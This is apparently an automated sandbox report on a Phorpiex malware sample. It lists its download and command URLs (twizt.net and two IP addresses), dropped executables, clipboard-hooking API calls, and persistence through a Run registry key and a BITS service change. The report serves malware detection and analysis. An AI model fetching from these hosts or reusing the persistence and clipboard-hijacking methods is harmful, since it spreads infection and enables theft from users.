Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/5
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/5R
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/5h.dll
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/5h.dllm
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/5z
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/6
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.233.132.177/6b
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.20
Source: 135143440.exe, 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 135143440.exe, 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, sysvratrel.exe, 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 1682018248.exe, 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 1682018248.exe, 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, sysvratrel.exe, 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, sysvratrel.exe, 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysvratrel.exe, 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 135143440.exe.0.dr, sysvratrel.exe0.3.dr, 1682018248.exe.3.dr, sysvratrel.exe.3.dr, newtpp[1].exe.0.dr	String found in binary or memory: http://91.202.233.141/
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/1p3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2W3C
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/2s
Source: 135143440.exe, 00000003.00000002.4535794136.0000000000711000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/3rosoft
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4%
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/40
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4l3
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/4z
Source: 135143440.exe, 00000003.00000002.4536101356.00000000024AB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/5
Source: 135143440.exe, 00000003.00000002.4535794136.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/5O
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/6
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/6-3
Source: 135143440.exe, 00000003.00000002.4535794136.00000000006F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/6L2
Source: 135143440.exe, 00000003.00000002.4535794136.000000000068E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.141/6ZF
Source: newtpp[1].exe.0.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: newtpp[1].exe.0.dr	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/=
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/new
Source: 957C4XK6Lt.exe, 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.exe
Source: 957C4XK6Lt.exe	String found in binary or memory: http://twizt.net/newtpp.exeP0
Source: 957C4XK6Lt.exe, 00000000.00000000.2068632504.0000000000532000.00000002.00000001.01000000.00000003.sdmp, 957C4XK6Lt.exe, 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://twizt.net/newtpp.exeP0S
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/newtpp.z%
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/pei
Source: 957C4XK6Lt.exe	String found in binary or memory: http://twizt.net/peinstall.php
Source: 957C4XK6Lt.exe	String found in binary or memory: http://twizt.net/peinstall.php%temp%%s
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.php5%z
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.00000000008DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpb
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpm%
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpshqos.dll.muiS9
Source: 957C4XK6Lt.exe, 00000000.00000002.2175793520.0000000000905000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://twizt.net/peinstall.phpystem32

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Code function: 3_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,

3_2_00405910

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	3_2_004048A0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_004048A0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_004048A0

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

3_2_00405910

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

3_2_00405910

Spam, unwanted Advertisements and Ransom Demands

Yara detected Phorpiex

Source: Yara match	File source: 5.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.1682018248.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.sysvratrel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.135143440.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 135143440.exe PID: 6684, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1682018248.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 2012, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sysvratrel.exe PID: 6196, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\sysvratrel.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1682018248.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\135143440.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	3_2_0040D6E0
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040F319 NtQueryVirtualMemory,	3_2_0040F319
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	5_2_0040D6E0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040F319 NtQueryVirtualMemory,	5_2_0040F319
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040D6E0 NtQuerySystemTime,RtlTimeToSecondsSince1980,	8_2_0040D6E0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040F319 NtQueryVirtualMemory,	8_2_0040F319

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

File created: C:\Windows\sysvratrel.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040F0DC	3_2_0040F0DC
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00404090	3_2_00404090
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_004048A0	3_2_004048A0
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_0040A740	3_2_0040A740
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00407D60	3_2_00407D60
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Code function: 3_2_00407D89	3_2_00407D89
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040F0DC	5_2_0040F0DC
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00404090	5_2_00404090
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_004048A0	5_2_004048A0
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_0040A740	5_2_0040A740
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00407D60	5_2_00407D60
Source: C:\Users\user\sysvratrel.exe	Code function: 5_2_00407D89	5_2_00407D89
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040F0DC	8_2_0040F0DC
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00404090	8_2_00404090
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_004048A0	8_2_004048A0
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_0040A740	8_2_0040A740
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00407D60	8_2_00407D60
Source: C:\Users\user\sysvratrel.exe	Code function: 8_2_00407D89	8_2_00407D89

Source: 957C4XK6Lt.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/7@1/60

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Code function: 3_2_00406B30 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,

3_2_00406B30

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Code function: 3_2_00407230 CoCreateInstance,

3_2_00407230

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Mutant created: \Sessions\1\BaseNamedObjects\ax765638x6xa

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

File created: C:\Users\user\AppData\Local\Temp\135143440.exe

Jump to behavior

Source: 957C4XK6Lt.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 957C4XK6Lt.exe	ReversingLabs: Detection: 68%
Source: 957C4XK6Lt.exe	Virustotal: Detection: 55%

Source: unknown	Process created: C:\Users\user\Desktop\957C4XK6Lt.exe "C:\Users\user\Desktop\957C4XK6Lt.exe"
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Process created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exe
Source: unknown	Process created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Process created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exe
Source: unknown	Process created: C:\Windows\sysvratrel.exe "C:\Windows\sysvratrel.exe"
Source: unknown	Process created: C:\Users\user\sysvratrel.exe "C:\Users\user\sysvratrel.exe"
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Process created: C:\Users\user\AppData\Local\Temp\135143440.exe C:\Users\user\AppData\Local\Temp\135143440.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Process created: C:\Users\user\AppData\Local\Temp\1682018248.exe C:\Users\user\AppData\Local\Temp\1682018248.exe	Jump to behavior

Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1682018248.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\sysvratrel.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\sysvratrel.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dll

Jump to behavior

Source: 957C4XK6Lt.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 957C4XK6Lt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 957C4XK6Lt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 957C4XK6Lt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 957C4XK6Lt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 957C4XK6Lt.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\957C4XK6Lt.exe

Code function: 0_2_00531A91 push ecx; ret

0_2_00531AA4

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\sysvratrel.exe

Source: C:\Users\user\Desktop\957C4XK6Lt.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\newtpp[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\957C4XK6Lt.exe	File created: C:\Users\user\AppData\Local\Temp\135143440.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	File created: C:\Users\user\AppData\Local\Temp\1682018248.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	File created: C:\Windows\sysvratrel.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	File created: C:\Users\user\sysvratrel.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

File created: C:\Users\user\sysvratrel.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

File created: C:\Windows\sysvratrel.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

File created: C:\Users\user\sysvratrel.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\135143440.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITS

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\135143440.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings	Jump to behavior
